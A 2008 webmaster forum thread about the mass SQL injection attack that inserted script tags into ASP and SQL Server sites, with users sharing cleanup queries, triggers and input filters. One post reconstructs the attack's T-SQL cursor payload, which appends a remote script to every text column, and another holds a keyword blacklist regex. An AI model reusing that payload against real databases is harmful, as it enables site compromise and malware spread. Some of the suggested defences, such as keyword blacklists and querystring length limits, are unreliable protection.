Welcome to WebmasterWorld Guest from

Forum Moderators: open

Message Too Old, No Replies

Sql Injection virus problem.

Virus, Sql Injection.



10:02 am on May 23, 2008 (gmt 0)

5+ Year Member

Hi Friends, we have a website and we have constanly been attacked by virus. A malicious script enters into sql server database and stops the site.
can any one please suggest us how we can prevent it. I changed some script but that did not help too. I think it is going from our search field. <script>......</script> and inside website name enters into every fields of sql .Please help!

Umar Rahman

[edited by: jatar_k at 12:03 pm (utc) on May 23, 2008]
[edit reason] no urls thanks [/edit]


7:41 pm on May 31, 2008 (gmt 0)

10+ Year Member

For those who have the same issue as myself, here is what I did, if that can help anyone

First I used Narayana Vyas Kondreddi medhod posted above and then for remaining ntext data type I went through all the table with that kind field and did it one by one using the following statement,

Update <dbTable>
set <tbField> = replace (cast(tbField as nvarchar(4000)), '<spamstr>', '')


6:40 pm on Jun 3, 2008 (gmt 0)

5+ Year Member

Just got hit. To prevent further attacks I'm implementing some code in an include that checks the full querystring for the presence of sql commands such as "select", "update", etc... characters that should not be present... I'm using regular expressions but simple instr() functions would work also. The key is to do these checks before any sql commands are issues from your scripts, and if triggered to redirect the user to a simple 404 error page.


7:57 am on Jun 7, 2008 (gmt 0)

5+ Year Member


I have converted all SQLs to StoredProcedure. As of now, there is no SQL commands in my C# code behind ! Still the virus is infected in my database. ( NOTE: I have connection string stored in my WEB.Config ).


8:00 am on Jun 7, 2008 (gmt 0)

5+ Year Member

I would Suggest all of you to write a TRIGGER on UPDATE EVENT of the table, Check for presence of script tag in NEW VALUES and roll back


6:50 am on Jun 9, 2008 (gmt 0)

5+ Year Member


-- Description:<Description,,>
-- =============================================
ON [DBO].[BusMaster]
@Bus varchar(150)
-- SET NOCOUNT ON added to prevent extra result sets from
-- interfering with SELECT statements.

if exists (select * from inserted)
select @Bus=BusName from inserted
if @bus like '%<script%' or @bus like '%script>%'
-- Insert statements for trigger here



5:00 pm on Jun 12, 2008 (gmt 0)

5+ Year Member

I've picked apart how the attach inserts it's data.

On a page that is seen to use querystrings, it adds the following to the end of whatever the valid params are (I've split the line for clarity).


This then runs the following SQL (I've mangled the script tag and URL).

DECLARE Table_Cursor
CURSOR FOR SELECT a.name,b.name
FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u'
AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<scpt src=http://www.thesite.com/b.js></scpt>''')
CLOSE Table_Cursor



3:45 pm on Jun 13, 2008 (gmt 0)

5+ Year Member

I've cured it very simply by putting the following code at the top of every page. It's part of the generic header include stuff that gets pulled into every page.

(In ASP, don't know what the syntax would be in other web languages).

if len(Request.Servervariables("Query_String")) > 40 then
response.write "Invalid page access"
end if

40 - This is bigger than the querystring that any page on your website will post, adjust as necessary. Given that the injection is 1100 characters, the check could be a lot higher if needed.

Other options would be to redirect to a 404 page or other error, but redirects probably won't to honoured by the webbot so it's easiest to just stop the page dead.



4:08 pm on Aug 7, 2008 (gmt 0)

5+ Year Member

Hey guys,

My site was hit too. Really Nasty!

I got all that bad data out but I want to make sure this wont happen again.

My question is, in this code below, Can I add this to my global.asa file to ensure all asp pages are protected?

will this work reguardless of how the ASP page was constructed?

' this creates a global regexp object g_bl for testing strings against sql injection
dim g_bl, strURLRequest
set g_bl = New RegExp
g_bl.Pattern = "<IFRAME¦<FRAME¦<object¦</object¦'¦xp_¦;¦--¦/\*¦<script¦</script¦ntext¦nchar¦varchar¦nvarchar¦alter¦begin¦create¦cursor¦declare¦delete¦drop¦exec¦execute¦fetch¦insert¦kill¦open¦sys¦sysobjects¦syscolumns¦table¦update"
g_bl.IgnoreCase = true
g_bl.Multiline = true

If Request.ServerVariables("QUERY_STRING") <> "" Then
strURLRequest= Request.ServerVariables("QUERY_STRING")
If g_bl.test(strURLRequest) Then
End IF
End IF

I feel like im missing something here. I really just need this to protect my site and data?

[edited by: engine at 5:30 pm (utc) on Aug. 7, 2008]
[edit reason] sidescroll [/edit]


1:04 pm on Aug 9, 2008 (gmt 0)

WebmasterWorld Senior Member billys is a WebmasterWorld Top Contributor of All Time 10+ Year Member

We're patched against this type of attack, but I've got some bot trying to get in for nearly 24 hours now...


2:50 pm on Aug 10, 2008 (gmt 0)

5+ Year Member

Couple of days ago I also noticed this type of an attack on one of my sites (same/very similar signature). No damage that I can see. I read through this and other linked threads, and it really sounds like "script kiddies" are trying to do this. After decoding hex data, attempt on my site is trying to run javascript file coming from cn domain as well, but it's different then some listed in other threads. Using SEs I searched for source payload using
and can see that number of affected (and indexed) sites is rising by the day. Ofcourse payload file can be named anything but I was curious about this particular "strain" of file. For those of you wanting to play along at home search for w dot js in parenthesis.


12:34 am on Aug 16, 2008 (gmt 0)

WebmasterWorld Senior Member billys is a WebmasterWorld Top Contributor of All Time 10+ Year Member

The attack on my site wound up going on for around 36 hours. Waste of bandwidth.


3:06 am on Aug 16, 2008 (gmt 0)

5+ Year Member

There must be a list of urls that "attackers" (script kiddies) are using. I am seeing hits only on une uri...Most of attacks are coming from cn domains, although I am observing some originating from u.s. IPs as well (looks like cable and dsl lines (compromised machines maybe?)).


7:20 pm on Aug 16, 2008 (gmt 0)

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month

Stats of where the Declared SQL attacks are initiating from by Country ISO, generated from hits on one of my sites for the current Month. It was interesting to see what the breakdown was.This was generated as I was trying to figure out what if any ranges were worth blocking altogether in general.

ISO Percent Hits
CN 37.54% 369
US 26.55% 261
TW 05.80% 57
HK 04.07% 40
KR 03.66% 36
CA 03.05% 30
BE 02.03% 20
IT 01.83% 18
AU 01.42% 14
VN 01.22% 12
MY 01.02% 10
MX 00.92% 9
CL 00.81% 8
NZ 00.81% 8
GB 00.71% 7
IL 00.61% 6
NL 00.61% 6
RU 00.61% 6
JP 00.51% 5
BG 00.41% 4
BS 00.41% 4
CO 00.41% 4
DE 00.41% 4
FR 00.41% 4
SG 00.41% 4
TH 00.41% 4
CS 00.31% 3
AR 00.20% 2
BR 00.20% 2
CH 00.20% 2
FI 00.20% 2
HU 00.20% 2
ID 00.20% 2
MU 00.20% 2
NO 00.20% 2
PE 00.20% 2
PH 00.20% 2
PL 00.20% 2
PT 00.20% 2
RO 00.20% 2
TR 00.20% 2
VE 00.20% 2


10:49 am on Aug 22, 2008 (gmt 0)

10+ Year Member

I've been getting hit with this over the past few days.

A few of the hits caused a child process of httpd to segfault!

I was not compromised. Mod Security failed the attempts.
To be sure, I searched the database for "http" and "iframe" entires - 0.
The server was also checked by a server security specialist and they couldn't figure exactly why it segfaulted either. (Cannot replicate whatever the probes are doing, specifically)

I wouldn't have known this even happened if I hadn't been digging through /var/log/messages (no downtime or interruptions what-so-ever associated with the segfaults)

(Server: Linux/Apache, MySQL and PHP are both up to date.. with grsec kernel)

Anyone else experiencing this? Does anyone know why it's causing the killing of a child process?


3:12 pm on Aug 26, 2008 (gmt 0)

10+ Year Member

They are now attacking my pages that are static but end in .asp

You would think that after several weeks they would move on. Has anyone identified anything that would make them finally realize that the site was protected? A response code, 404 etc...? Maybe redirect them to the IP that's being used?


3:35 pm on Aug 26, 2008 (gmt 0)

5+ Year Member

lol they're doing the same thing with my site, hitting well over 100 times a day, not stopping for anyhting, and yes, hitting static pages that end in .asp

Can we send them to a page delay that lasts a few minutes to annoy them a little?


11:03 am on Oct 15, 2008 (gmt 0)

5+ Year Member

Hi Friends,

I m also having the similar problem with my website in ASP. My whole Database is infected with the content ''><script src=".../new.htm"> .... </script> all my data is corrupted . Its just an Sql Injection but i cant found the solution how it happens? Pls help me to solve this pls


4:45 am on Oct 16, 2008 (gmt 0)

5+ Year Member

This seems to be an old topic, and related to ASP (which I'm not familiar with), but how about encoding HTML char's before insertion into the database. So if someone enters

<script blah ""></script>

Before inserting the input into database, clean up and convert it to

&lt;script blah &quot;&quot;&gt&lt/script&gt;

Unless I'm missing something, after this the script won't get executed...
PHP has built in functions for this (htmlspceialchars() or similar).. donno about ASP
This 78 message thread spans 3 pages: 78

Featured Threads

Hot Threads This Week

Hot Threads This Month